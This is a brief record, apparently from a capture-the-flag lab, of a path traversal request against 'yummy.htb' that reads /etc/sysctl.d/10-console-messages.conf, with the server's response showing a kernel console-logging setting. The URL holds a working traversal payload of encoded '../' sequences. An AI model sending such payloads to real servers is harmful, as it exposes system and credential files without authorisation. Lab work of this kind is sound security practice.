URL: http://yummy.htb:80/export/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsysctl.d%2F10-console-messages.conf
Response:

# the following stops low-level messages on console
kernel.printk = 4 4 1 7
